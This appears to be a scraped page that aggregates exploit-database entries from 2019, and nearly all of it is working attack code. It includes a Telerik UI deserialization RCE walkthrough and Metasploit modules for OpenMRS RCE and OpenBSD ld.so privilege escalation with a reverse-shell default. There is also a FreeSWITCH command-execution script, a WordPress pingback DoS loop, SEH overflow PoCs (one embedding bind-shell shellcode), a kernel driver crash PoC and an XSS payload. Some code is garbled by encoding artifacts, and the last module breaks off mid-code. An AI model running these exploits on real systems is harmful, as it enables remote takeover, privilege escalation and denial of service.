ISHACK AI BOT

See the full write-up at Bishop Fox, CVE-2019-18935: https://know.bishopfox.com/research/cve-2019-18935-remote-code-execution-in-telerik-ui, for a complete walkthrough of vulnerability and exploit details for this issue (along with patching instructions). Install git clone https://github.com/noperator/CVE-2019-18935.git && cd CVE-2019-18935 python3 -m venv env source env/bin/activate pip3 install -r requirements.txt Requirements This exploit leverages encryption logic from RAU_crypto. The RAUCipher class within RAU_crypto.py depends on PyCryptodome, a drop-in replacement for the dead PyCrypto module. PyCryptodome and PyCrypto create problems when installed in the same environment, so the best way to satisfy this dependency is to install the module within a virtual environment, as shown above. Usage Compile mixed mode assembly DLL payload In a Windows environment with Visual Studio installed, use build_dll.bat to generate 32- and 64-bit mixed mode assembly DLLs to be used as a payload during deserialization. build_dll.bat sleep.c Upload and load payload into application via insecure deserialization Pass the DLL generated above to CVE-2019-18935.py, which will upload the DLL to a directory on the target server (provided that the web server has write permissions) and then load that DLL into the application via the insecure deserialization exploit. python3 CVE-2019-18935.py -u <HOST>/Telerik.Web.UI.WebResource.axd?type=rau -v <VERSION> -f 'C:\Windows\Temp' -p sleep_2019121205271355_x86.dll [*] Local payload name: sleep_2019121205271355_x86.dll [*] Destination folder: C:\Windows\Temp [*] Remote payload name: 1576142987.918625.dll {'fileInfo': {'ContentLength': 75264, 'ContentType': 'application/octet-stream', 'DateJson': '1970-01-01T00:00:00.000Z', 'FileName': '1576142987.918625.dll', 'Index': 0}, 'metaData': {'AsyncUploadTypeName': 'Telerik.Web.UI.UploadedFileInfo, ' 'Telerik.Web.UI, Version=<VERSION>, ' 'Culture=neutral, ' 'PublicKeyToken=<TOKEN>', 'TempFileName': '1576142987.918625.dll'}} [*] Triggering deserialization... <title>Runtime Error</title> <span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1> <h2> <i>Runtime Error</i> </h2></span> ...omitted for brevity... [*] Response time: 13.01 seconds In the example above, the application took at least 10 seconds to respond, indicating that the DLL payload successfully invoked Sleep(10000). Thanks @mwulftange initially discovered this vulnerability. @bao7uo wrote all of the logic for breaking RadAsyncUpload encryption, which enabled manipulating the file upload configuration object in rauPostData and subsequently exploiting insecure deserialization of that object. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47793.zip

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager def initialize(info = {}) super(update_info(info, 'Name' => 'OpenMRS Java Deserialization RCE', 'Description' => %q( OpenMRS is an open-source platform that supplies users with a customizable medical record system. There exists an object deserialization vulnerability in the `webservices.rest` module used in OpenMRS Platform. Unauthenticated remote code execution can be achieved by sending a malicious XML payload to a Rest API endpoint such as `/ws/rest/v1/concept`. This module uses an XML payload generated with Marshalsec that targets the ImageIO component of the XStream library. Tested on OpenMRS Platform `v2.1.2` and `v2.21` with Java 8 and Java 9. ), 'License' => MSF_LICENSE, 'Author' => [ 'Nicolas Serra', # Vuln Discovery and PoC 'mpgn', # PoC 'Shelby Pace' # Metasploit Module ], 'References' => [ [ 'CVE', '2018-19276' ], [ 'URL', 'https://talk.openmrs.org/t/critical-security-advisory-cve-2018-19276-2019-02-04/21607' ], [ 'URL', 'https://know.bishopfox.com/advisories/news/2019/02/openmrs-insecure-object-deserialization' ], [ 'URL', 'https://github.com/mpgn/CVE-2018-19276/' ] ], 'Platform' => [ 'unix', 'linux' ], 'Arch' => [ ARCH_X86, ARCH_X64 ], 'Targets' => [ [ 'Linux', { 'Arch' => [ ARCH_X86, ARCH_X64 ], 'Platform' => [ 'unix', 'linux' ], 'CmdStagerFlavor' => 'printf' } ] ], 'DisclosureDate' => '2019-02-04', 'DefaultTarget' => 0 )) register_options( [ Opt::RPORT(8081), OptString.new('TARGETURI', [ true, 'Base URI for OpenMRS', '/' ]) ]) register_advanced_options([ OptBool.new('ForceExploit', [ false, 'Override check result', false ]) ]) end def check res = send_request_cgi!('method' => 'GET', 'uri' => normalize_uri(target_uri.path)) return CheckCode::Unknown("OpenMRS page unreachable.") unless res return CheckCode::Safe('Page discovered is not OpenMRS.') unless res.body.downcase.include?('openmrs') response = res.get_html_document version = response.at('body//h3') return CheckCode::Detected('Successfully identified OpenMRS, but cannot detect version') unless version && version.text version_no = version.text version_no = version_no.match(/\d+\.\d+\.\d*/) return CheckCode::Detected('Successfully identified OpenMRS, but cannot detect version') unless version_no version_no = Gem::Version.new(version_no) if (version_no < Gem::Version.new('1.11.8') || version_no.between?(Gem::Version.new('2'), Gem::Version.new('2.1.3'))) return CheckCode::Appears("OpenMRS platform version: #{version_no}") end CheckCode::Safe end def format_payload payload_data = payload.encoded.to_s.encode(xml: :text) payload_arr = payload_data.split(' ', 3) payload_arr.map { |arg| "<string>#{arg}</string>" }.join.gsub("'", "") end def read_payload_data(payload_cmd) # payload generated with Marshalsec erb_path = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-19276', 'payload.erb') payload_data = File.binread(erb_path) payload_data = ERB.new(payload_data).result(binding) rescue Errno::ENOENT fail_with(Failure::NotFound, "Failed to find erb file at the given path: #{erb_path}") end def execute_command(cmd, opts={}) cmd = cmd.encode(xml: :text) xml_data = "<string>sh</string><string>-c</string><string>#{cmd}</string>" rest_uri = normalize_uri(target_uri.path, 'ws', 'rest', 'v1', 'concept') payload_data = read_payload_data(xml_data) send_request_cgi( 'method' => 'POST', 'uri' => rest_uri, 'headers' => { 'Content-Type' => 'text/xml' }, 'data' => payload_data ) end def exploit chk_status = check print_status('Target is running OpenMRS') if chk_status == CheckCode::Appears unless ((chk_status == CheckCode::Appears || chk_status == CheckCode::Detected) || datastore['ForceExploit'] ) fail_with(Failure::NoTarget, 'Target is not vulnerable') end cmds = generate_cmdstager(:concat_operator => '&&') print_status('Sending payload...') cmds.first.split('&&').map { |cmd| execute_command(cmd) } end end

# Exploit Title: SurfOffline Professional 2.2.0.103 - 'Project Name' Denial of Service (SEH) # Date: 2019-12-18 # Exploit Author: Chris Inzinga # Vendor Homepage: http://www.bimesoft.com/ # Software Link: https://www.softpedia.com/get/Internet/Offline-Browsers/SurfOffline.shtml # Version: 2.2.0.103 # Tested on: Windows 7 SP1 (x86) # Steps to reproduce: # 1. Generate a malicious payload via the PoC # 2. In the application set the 'Start Page URL' to any value, it doesn't matter. # 3. Paste the PoC payload as the 'Project Name' and click 'next' and 'finish'. # 4. Observe a program DOS crash, overwriting SEH=20 #!/usr/bin/python payload =3D "A" * 382 + "B" * 4 + "C" * 4 try: fileCreate =3Dopen("exploit.txt","w") print("[x] Creating file") fileCreate.write(payload) fileCreate.close() print("[x] File created") except: print("[!] File failed to be created")

# Exploit Title: Deutsche Bahn Ticket Vending Machine Local Kiosk - Privilege Escalation # Date: 2019-12-18 # Exploit Author: Vulnerability-Lab # Vendor Homepage: https://www.bahn.de/db_vertrieb/view/leistungen/automaten-fahrkartenentwerter.shtml # Tested on: Windows XP Document Title: =============== Deutsche Bahn Ticket Vending Machine - Local Kiosk Privilege Escalation Vulnerability References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2191 Vulnerability Magazine: https://www.vulnerability-db.com/?q=articles/2019/12/13/zero-day-vulnerability-deutsche-bahn-ticket-machine-series-system-uncovered Release Date: ============= 2019-12-14 Vulnerability Laboratory ID (VL-ID): ==================================== 2191 Common Vulnerability Scoring System: ==================================== 6.4 Vulnerability Class: ==================== Privilege Escalation Product & Service Introduction: =============================== Customers can buy tickets at our ticket machines at any time, regardless of opening hours. Thus, the vending machine also secures sales in rural areas. - innovatively designed user guidance - Real-time timetable information for rail traffic - traveler information - ticket paper supply - free fault hotline: 0800 2886644 - Professional and contemporary maintenance The ticket vending machine can also be configured according to individual requirements. The housing can be designed as desired. Customers can purchase their tickets with different means of payment. User guidance is available in different languages. (Copy of the Homepage: https://www.bahn.de/db_vertrieb/view/leistungen/automaten-fahrkartenentwerter.shtml ) Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered a local kiosk privilege escalation vulnerability in the deutsche bahn ticket vending machine series with windows xp. Vulnerability Disclosure Timeline: ================================== 2019-12-14: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Exploitation Technique: ======================= Local Severity Level: =============== Medium Authentication Type: ==================== No authentication (guest) User Interaction: ================= No User Interaction Disclosure Type: ================ Responsible Disclosure Program Technical Details & Description: ================================ A kiosk mode escalation vulnerability has been discovered in the official deutsche bahn ticket vending machine series for windows. The security vulnerability allows local attackers to bypass the kiosk mode to compromise the local file system and applications. It is possible for local attackers to break out of the kiosk mode of the Deutsche Bahn vending machine application if the Password Agent (PasswordAgent.exe) of the system receives a timeout or has a runtime error in the program itself in the background. These errors can occur due to aborted sessions, unclean logout or common errors when using the application at system level. In the event of a local error, attackers can bring the error message to the foreground by pressing the number field - Cancel during a transaction. After the error message becomes visible, the attacker can click on a link of the error message where you can normally see what the error report contains. The attacker will then be redirected to a form in the error message, where he can search for errors in a collection of microsoft articles via "Submit / Dont' Submit" or another link on the online path. There the attacker clicks on it and receives the web browser. From the web browser, the attacker retrieves the options menu and can access the local system directory and has then the ability to compromise the ticket vending machine with windows xp. The error message is normally on those devices deactivated through a hardening process of the servce provider. In that special case the exception handling of windows was not deactivated or set to the background, which allows the attacker to move through to other options to finally access the file system via browser. The ticket vending machine vulnerability requires no user interaction and can only be exploited by local attackers with physical device access. No keyboard or front loader opening required. Vulnerable System(s): [+] Windows XP Affected Component(s): [+] Exception Handling (Error Message Content) Proof of Concept (PoC): ======================= The local vulnerability can be exploited by local attackers with physical device access without user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. PoC: Sheet PasswordAgent.exe := Unexpected Error (Background) - Runtime/Session/Timeout => Transaction Application => Cancel := Unexpected Error (Background) - Runtime/Session/Timeout (Front) => Click Error Report => Click Search Collection => Web Browser => Local File System => PWND! What are attackers able to do when the file system of the vending machine is accessable thus way? 1. Inject of local malware to the ticket machine (editor / debugger / cmd / ps - exp. ransomware/malware) 2. Local manipulation for skimming devices to assist (transmit prepares) 2. Phishing of local credentials from screen via system (db browser application) 3. Intercept or manipulation to access card information (local file system - sniff/extract) 4. Crash or freeze the computer system (exp. kill of process / loop script) 5. Scare or joké activities (exp. html / js to front screens with web browser or by a new window process) Refernece(s): https://www.vulnerability-db.com/sites/default/files//newscenter-gallery/IMG_6457.JPG https://www.vulnerability-db.com/sites/default/files//newscenter-gallery/IMG_6458.JPG https://www.vulnerability-db.com/sites/default/files//newscenter-gallery/IMG_6460.JPG Solution - Fix & Patch: ======================= There are now several problems related to system hardening that can be resolved: 1. It should not be possible for users with system user rights to use the web browsers 2. The error message menu can be deactivated or completely modified 3. Some functions in menus can be deactivated by hardening (browser, messages & Co.) 4. Check that all other tasks are always running in the background or are being moved there permanently 5. The deutsche bahn vending machine application and user interface should be shut down in the event of persistent errors in the foreground 6. The activities of the testing has been logged but did not triggered any alert for defense purpose Deutsche Bahn: Patch Rollout in Progress https://www.vulnerability-db.com/sites/default/files//newscenter-gallery/073915298_0.png https://www.vulnerability-db.com/sites/default/files//newscenter-gallery/dbatm78235.png Security Risk: ============== The security risk of the local ticket vending machine system vulnerability is estimated as high. The bug to escalate can be easily exploited by local interaction with the touch display to access the file system. Credits & Authors: ================== Benjamin K.M. - https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M. Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. Domains: www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@) to get a ask permission. Copyright © 2019 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com

# Exploit Title: FTP Navigator 8.03 - 'Custom Command' Denial of Service (SEH) # Date: 2019-12-18 # Exploit Author: Chris Inzinga # Vendor Homepage: http://www.internet-soft.com/ # Software Link: https://www.softpedia.com/dyn-postdownload.php/5edd515b8045f156a9dd48599c2539e5/5dfa4560/d0c/0/1 # Version: 8.03 # Tested on: Windows 7 SP1 (x86) # Steps to reproduce: # 1. Generate a malicious payload via the POC # 2. In the application click "FTP - Server" > "Custom Command" # 3. Paste the contents of the PoC file into the input box below SERVER LIST and press "Do it!" # 4. Observe a program DOS crash, overwriting SEH #!/usr/bin/python payload = "A" * 4108 + "B" * 4 + "C" * 40 try: fileCreate =open("exploit.txt","w") print("[x] Creating file") fileCreate.write(payload) fileCreate.close() print("[x] File created") except: print("[!] File failed to be created")

# Exploit Title: Microsoft Windows 10 BasicRender.sys - Denial of Service (PoC) # Date: 2019-12-20 # Exploit author: vportal # Vendor homepage: http://www.microsoft.com # Version: Windows 10 1803 x86 # Tested on: Windows 10 1803 x86 # CVE: N/A # A Null pointer deference exists in the WARPGPUCMDSYNC function of the # BasicRender.sys driver. An unprivileged user can trigger the vulnerability # to crash the system and deny the service to the rest of the users. *PoC:* #include <Windows.h> #include <d3dkmthk.h> D3DKMT_CREATEDEVICE* device = NULL; device = new D3DKMT_CREATEDEVICE(); D3DKMT_ENUMADAPTERS enumAdapter = { 0 }; D3DKMTEnumAdapters(&enumAdapter); device->hAdapter = enumAdapter.Adapters[1].hAdapter; logger(log_counter, "EnumAdapter"); D3DKMTCreateDevice(device); D3DKMT_CREATECONTEXTVIRTUAL* contextVirtual = NULL; contextVirtual = new D3DKMT_CREATECONTEXTVIRTUAL(); memset(contextVirtual, 0, sizeof(D3DKMT_CREATECONTEXTVIRTUAL)); contextVirtual->hDevice = device->hDevice; char data[0x200] = { 0 }; memset(data, 0xff, 0x200); contextVirtual->PrivateDriverDataSize = 0x200; contextVirtual->pPrivateDriverData = data; contextVirtual->ClientHint = D3DKMT_CLIENTHINT_DX10; contextVirtual->Flags.InitialData = 0x000001; contextVirtual->Flags.NullRendering = 0x0; D3DKMT_SUBMITCOMMAND* submitCommand = NULL; submitCommand = new D3DKMT_SUBMITCOMMAND(); submitCommand->BroadcastContext[0] = 0x40000240; for (int i = 0; i < 0x10; i++) submitCommand->WrittenPrimaries[i] = 0x0; submitCommand->PresentHistoryToken = 0x100; submitCommand->Commands = 0x004b39; submitCommand->CommandLength = 0x00000d; submitCommand->BroadcastContext[0] = contextVirtual->hContext; submitCommand->BroadcastContextCount = 0x1; submitCommand->Flags.PresentRedirected = 0x1; submitCommand->PrivateDriverDataSize = 0x130; char* PrivateData = NULL; PrivateData = new char[submitCommand->PrivateDriverDataSize]; memset(PrivateData, 0x00, submitCommand->PrivateDriverDataSize); *(DWORD*)(PrivateData + 0x118) = 0x434e5953; *(DWORD*)(PrivateData + 0x11c) = 0x18; *(DWORD*)(PrivateData + 0x120) = 0x000110; *(DWORD*)(PrivateData + 0x124) = 0x000420; *(DWORD*)(PrivateData + 0x128) = 0x0; *(DWORD*)(PrivateData + 0x12c) = 0x000428; submitCommand->pPrivateDriverData = PrivateData; D3DKMTSubmitCommand(submitCommand); -------------------------------------------------------------------------- *Crash dump*: STACK_TEXT: 8afae92c 8fe82cb2 8afae958 fffffffd 0000048c BasicRender!WARPGPUCMDSYNC::WARPGPUCMDSYNC+0xc 8afae94c 8fe8267d bb26afe8 00000000 bb26afe0 BasicRender!WARPKMCONTEXT::SubmitVirtual+0x4a 8afae9a8 8fca6af5 91e05000 bb26afe0 93dfc000 BasicRender!WarpKMSubmitCommandVirtual+0x87 8afae9fc 8fc2a934 8afaea68 8afaeac0 92b19db6 dxgkrnl!ADAPTER_RENDER::DdiSubmitCommandVirtual+0x115 8afaea08 92b19db6 90114c30 8afaea68 b78da008 dxgkrnl!ADAPTER_RENDER_DdiSubmitCommandVirtual+0x10 8afaeac0 92b4ac94 93dfc000 cd6ee008 cc6d8860 dxgmms2!VidSchiSendToExecutionQueue+0x526 8afaeb90 92b764a9 00000000 945f5a80 00000000 dxgmms2!VidSchiSubmitRenderVirtualCommand+0x534 8afaebb8 81ee80bc 93dfc000 28e5f697 00000000 dxgmms2!VidSchiWorkerThread+0x1a1 8afaebf0 81fe952d 92b76308 93dfc000 00000000 nt!PspSystemThreadStartup+0x4a 8afaebfc 00000000 00000000 bbbbbbbb bbbbbbbb nt!KiThreadStartup+0x15 eax=8afae958 ebx=00000000 ecx=00000000 edx=00000000 *esi*=00000000 edi=bb26afd8 eip=8fe8386c esp=8afae920 ebp=8afae92c iopl=0 nv up ei pl zr na pe nc cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010246 BasicRender!WARPGPUCMDSYNC::WARPGPUCMDSYNC+0xc: 8fe8386c c7061060e88f mov dword ptr [esi],offset BasicRender!WARPGPUCMDSYNC::`vftable' (8fe86010) ds:0023:00000000=???????? Resetting default scope -------------------------------------------------------------------------------- The vulnerability has only been tested in Windows 10 x86 1803. CVSS Base Score: 5.5 Credit: Victor Portal

# Exploit Title: FreeSWITCH 1.10.1 - Command Execution # Date: 2019-12-19 # Exploit Author: 1F98D # Vendor Homepage: https://freeswitch.com/ # Software Link: https://files.freeswitch.org/windows/installer/x64/FreeSWITCH-1.10.1-Release-x64.msi # Version: 1.10.1 # Tested on: Windows 10 (x64) # # FreeSWITCH listens on port 8021 by default and will accept and run commands sent to # it after authenticating. By default commands are not accepted from remote hosts. # # -- Example -- # root@kali:~# ./freeswitch-exploit.py 192.168.1.100 whoami # Authenticated # Content-Type: api/response # Content-Length: 20 # # nt authority\system # #!/usr/bin/python3 from socket import * import sys if len(sys.argv) != 3: print('Missing arguments') print('Usage: freeswitch-exploit.py <target> <cmd>') sys.exit(1) ADDRESS=sys.argv[1] CMD=sys.argv[2] PASSWORD='ClueCon' # default password for FreeSWITCH s=socket(AF_INET, SOCK_STREAM) s.connect((ADDRESS, 8021)) response = s.recv(1024) if b'auth/request' in response: s.send(bytes('auth {}\n\n'.format(PASSWORD), 'utf8')) response = s.recv(1024) if b'+OK accepted' in response: print('Authenticated') s.send(bytes('api system {}\n\n'.format(CMD), 'utf8')) response = s.recv(8096).decode() print(response) else: print('Authentication failed') sys.exit(1) else: print('Not prompted for authentication, likely not vulnerable') sys.exit(1)

# Exploit Title: phpMyChat-Plus 1.98 - 'pmc_username' Reflected Cross-Site Scripting # Date: 2019-12-19 # Exploit Author: Chris Inzinga # Vendor Homepage: http://ciprianmp.com/latest/ # Download: https://sourceforge.net/projects/phpmychat/ # Tested On: Linux & Mac # Version: 1.98 # CVE: CVE-2019-19908 Description: The "pmc_username" parameter of pass_reset.php is vulnerable to reflected XSS Payload: "><script>alert('xss')</script> Vulnerable URL: http://localhost/plus/pass_reset.php?L=english&pmc_username="><script>alert('xss')</script>

#!/usr/bin/env python # WordPress <= 5.3.? Denial-of-Service PoC # Abusing pingbacks+xmlrpc multicall to exhaust connections # @roddux 2019 | Arcturus Security | labs.arcturus.net # TODO: # - Try and detect a pingback URL on target site # - Optimise number of entries per request, check class-wp-xmlrpc-server.php from urllib.parse import urlparse import sys, uuid, urllib3, requests urllib3.disable_warnings() DEBUG = True def dprint(X): if DEBUG: print(X) COUNT=0 def build_entry(pingback,target): global COUNT COUNT +=1 entry = "<value><struct><member><name>methodName</name><value>pingback.ping</value></member><member>" entry += f"<name>params</name><value><array><data><value>{pingback}/{COUNT}</value>" #entry += f"<name>params</name><value><array><data><value>{pingback}/{uuid.uuid4()}</value>" entry += f"<value>{target}/?p=1</value></data></array></value></member></struct></value>" #entry += f"<value>{target}/#e</value></data></array></value></member></struct></value>" # taxes DB more return entry def build_request(pingback,target,entries): prefix = "<methodCall><methodName>system.multicall</methodName><params><param><array>" suffix = "</array></param></params></methodCall>" request = prefix for _ in range(0,entries): request += build_entry(pingback,target) request += suffix return request def usage_die(): print(f"[!] Usage: {sys.argv[0]} <check/attack> <pingback url> <target url>") exit(1) def get_args(): if len(sys.argv) != 4: usage_die() action = sys.argv[1] pingback = sys.argv[2] target = sys.argv[3] if action not in ("check","attack"): usage_die() for URL in (pingback,target): res = urlparse(URL) if not all((res.scheme,res.netloc)): usage_die() return (action,pingback,target) def main(action,pingback,target): print("[>] WordPress <= 5.3.? Denial-of-Service PoC") print("[>] @roddux 2019 | Arcturus Security | labs.arcturus.net") # he checc if action == "check": entries = 2 # he attacc elif action == "attack": entries = 2000 # but most importantly print(f"[+] Running in {action} mode") # he pingbacc print(f"[+] Got pingback URL \"{pingback}\"") print(f"[+] Got target URL \"{target}\"") print(f"[+] Building {entries} pingback calls") # entries = 1000 # TESTING xmldata = build_request(pingback,target,entries) dprint("[+] Request:\n") dprint(xmldata+"\n") print(f"[+] Request size: {len(xmldata)} bytes") if action == "attack": print("[+] Starting attack loop, CTRL+C to stop...") rcount = 0 try: while True: try: resp = requests.post(f"{target}/xmlrpc.php", xmldata, verify=False, allow_redirects=False, timeout=.2) #dprint(resp.content.decode("UTF-8")[0:500]+"\n") if resp.status_code != 200: print(f"[!] Received odd status ({resp.status_code}) -- DoS successful?") except (requests.exceptions.Timeout, requests.exceptions.ConnectionError) as e: pass rcount += 1 print(f"\r[+] Requests sent: {rcount}",end="") except KeyboardInterrupt: print("\n[>] Attack finished",end="\n\n") exit(0) elif action == "check": print("[+] Sending check request") try: resp = requests.post(f"{target}/xmlrpc.php", xmldata, verify=False, allow_redirects=False, timeout=10) if resp.status_code != 200: print(f"[!] Received odd status ({resp.status_code}) -- check target url") print("[+] Request sent") print("[+] Response headers:\n") print(resp.headers) print("[+] Response dump:") print(resp.content.decode("UTF-8")) print("[+] Here's the part where you figure out if it's vulnerable, because I CBA to code it") except (requests.exceptions.Timeout, requests.exceptions.ConnectionError) as e: print("[!] Connection error") exit(1) print("[>] Check finished") if __name__ == "__main__": main(*get_args())

# Exploit Title: XnConvert 1.82 - Denial of Service (PoC) # Date: 2019-12-21 # Vendor Homepage: https://www.xnview.com # Software Link: https://www.xnview.com/en/apps/ # Exploit Author: Gokkulraj (TwinTech Solutions) # Tested Version: v1.82 # Tested on: Windows 7 x64 # 1.- Download and install XnConvert # 2.- Run python code : XnConvert.py # 3.- Open EVIL.txt and copy content to clipboard # 4.- Open XnConvert and Click 'EnterKey' # 5.- Paste the content of EVIL.txt into the Field: 'User Name and Registration Code' # 6.- Click 'OK' and you will see a pop-up stating Invalid code and then click 'OK' you will see the crash. #!/usr/bin/env python Dos= "\x41" * 9000 myfile=open('Evil.txt','w') myfile.writelines(Dos) myfile.close() print("File created")

# Exploit Title: Prime95 Version 29.8 build 6 - Buffer Overflow (SEH) # Date: 2019-12-22 # Vendor Homepage: https://www.mersenne.org # Software Link: http://www.mersenne.org/ftp_root/gimps/p95v298b6.win32.zip # Exploit Author: Achilles # Tested Version: 29.8 build 6 # Tested on: Windows 7 x64 # 1.- Run python code:Prime95.py # 2.- Open EVIL.txt and copy content to Clipboard # 3.- Open Prime95.exe go to PrimeNet # 4.- Paste the Content of EVIL.txt into the field "Optional User ID and Optional Computer Name" # 5.- Click Connection Paste the Content of EVIL.txt into the field "Option al proxy Host" # 6.- Press ok Twice and you will have a bind shell port 3110 # 7.- Greetings go:XiDreamzzXi,Metatron #!/usr/bin/env python import struct buffer =3D "\x41" * 660 nseh =3D "\xeb\x06\x90\x90" #jmp short 6 seh =3D struct.pack('<L',0x6ee410b1) #libhwloc-15.dll nops =3D "\x90" * 20 #msfvenom -a x86 --platform windows -p windows/shell_bind_tcp LPORT=3110 -e x86/shikata_ga_nai -b "\x00\x0a\x0d" -i 1 -f python #badchars "\x00\x0a\x0d" shellcode =3D ("\xb8\xf4\xc0\x2a\xd0\xdb\xd8\xd9\x74\x24\xf4\x5a\x2b"=20 "\xc9\xb1\x53\x31\x42\x12\x83\xea\xfc\x03\xb6\xce\xc8" "\x25\xca\x27\x8e\xc6\x32\xb8\xef\x4f\xd7\x89\x2f\x2b" "\x9c\xba\x9f\x3f\xf0\x36\x6b\x6d\xe0\xcd\x19\xba\x07" "\x65\x97\x9c\x26\x76\x84\xdd\x29\xf4\xd7\x31\x89\xc5" "\x17\x44\xc8\x02\x45\xa5\x98\xdb\x01\x18\x0c\x6f\x5f" "\xa1\xa7\x23\x71\xa1\x54\xf3\x70\x80\xcb\x8f\x2a\x02" "\xea\x5c\x47\x0b\xf4\x81\x62\xc5\x8f\x72\x18\xd4\x59" "\x4b\xe1\x7b\xa4\x63\x10\x85\xe1\x44\xcb\xf0\x1b\xb7" "\x76\x03\xd8\xc5\xac\x86\xfa\x6e\x26\x30\x26\x8e\xeb" "\xa7\xad\x9c\x40\xa3\xe9\x80\x57\x60\x82\xbd\xdc\x87" "\x44\x34\xa6\xa3\x40\x1c\x7c\xcd\xd1\xf8\xd3\xf2\x01" "\xa3\x8c\x56\x4a\x4e\xd8\xea\x11\x07\x2d\xc7\xa9\xd7" "\x39\x50\xda\xe5\xe6\xca\x74\x46\x6e\xd5\x83\xa9\x45" "\xa1\x1b\x54\x66\xd2\x32\x93\x32\x82\x2c\x32\x3b\x49" "\xac\xbb\xee\xe4\xa4\x1a\x41\x1b\x49\xdc\x31\x9b\xe1" "\xb5\x5b\x14\xde\xa6\x63\xfe\x77\x4e\x9e\x01\x7b\xa9" "\x17\xe7\xe9\xa5\x71\xbf\x85\x07\xa6\x08\x32\x77\x8c" "\x20\xd4\x30\xc6\xf7\xdb\xc0\xcc\x5f\x4b\x4b\x03\x64" "\x6a\x4c\x0e\xcc\xfb\xdb\xc4\x9d\x4e\x7d\xd8\xb7\x38" "\x1e\x4b\x5c\xb8\x69\x70\xcb\xef\x3e\x46\x02\x65\xd3" "\xf1\xbc\x9b\x2e\x67\x86\x1f\xf5\x54\x09\x9e\x78\xe0" "\x2d\xb0\x44\xe9\x69\xe4\x18\xbc\x27\x52\xdf\x16\x86" "\x0c\x89\xc5\x40\xd8\x4c\x26\x53\x9e\x50\x63\x25\x7e" "\xe0\xda\x70\x81\xcd\x8a\x74\xfa\x33\x2b\x7a\xd1\xf7" "\x5b\x31\x7b\x51\xf4\x9c\xee\xe3\x99\x1e\xc5\x20\xa4" "\x9c\xef\xd8\x53\xbc\x9a\xdd\x18\x7a\x77\xac\x31\xef" "\x77\x03\x31\x3a") payload =3D buffer + nseh + seh + nops + shellcode try: Dopen("Evil.txt","w") print "[+] Creating %s bytes evil payload.." %len(payload) f.write(payload) f.close() print "[+] File created!" except: print "File cannot be created"

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Post::File include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'OpenBSD Dynamic Loader chpass Privilege Escalation', 'Description' => %q{ This module exploits a vulnerability in the OpenBSD `ld.so` dynamic loader (CVE-2019-19726). The `_dl_getenv()` function fails to reset the `LD_LIBRARY_PATH` environment variable when set with approximately `ARG_MAX` colons. This can be abused to load `libutil.so` from an untrusted path, using `LD_LIBRARY_PATH` in combination with the `chpass` set-uid executable, resulting in privileged code execution. This module has been tested successfully on: OpenBSD 6.1 (amd64); and OpenBSD 6.6 (amd64) }, 'License' => MSF_LICENSE, 'Author' => [ 'Qualys', # Discovery and exploit 'bcoles' # Metasploit ], 'DisclosureDate' => '2019-12-11', 'Platform' => %w[bsd unix], # OpenBSD 'Arch' => [ARCH_CMD], 'SessionTypes' => ['shell'], 'References' => [ ['CVE', '2019-19726'], ['EDB', '47780'], ['URL', 'https://blog.qualys.com/laws-of-vulnerabilities/2019/12/11/openbsd-local-privilege-escalation-vulnerability-cve-2019-19726'], ['URL', 'https://www.qualys.com/2019/12/11/cve-2019-19726/local-privilege-escalation-openbsd-dynamic-loader.txt'], ['URL', 'https://www.openwall.com/lists/oss-security/2019/12/11/9'], ['URL', 'https://github.com/bcoles/local-exploits/blob/master/CVE-2019-19726/openbsd-dynamic-loader-chpass'], ['URL', 'https://ftp.openbsd.org/pub/OpenBSD/patches/6.6/common/013_ldso.patch.sig'] ], 'Targets' => [['Automatic', {}]], 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse', 'WfsDelay' => 10 }, 'DefaultTarget' => 0)) register_options [ OptString.new('CHPASS_PATH', [true, 'Path to chpass', '/usr/bin/chpass']) ] register_advanced_options [ OptBool.new('ForceExploit', [false, 'Override check result', false]), OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp']) ] end def base_dir datastore['WritableDir'].to_s end def chpass_path datastore['CHPASS_PATH'] end def upload(path, data) print_status "Writing '#{path}' (#{data.size} bytes) ..." rm_f path write_file path, data register_file_for_cleanup path end def is_root? (cmd_exec('id -u').to_s.gsub(/[^\d]/, '') 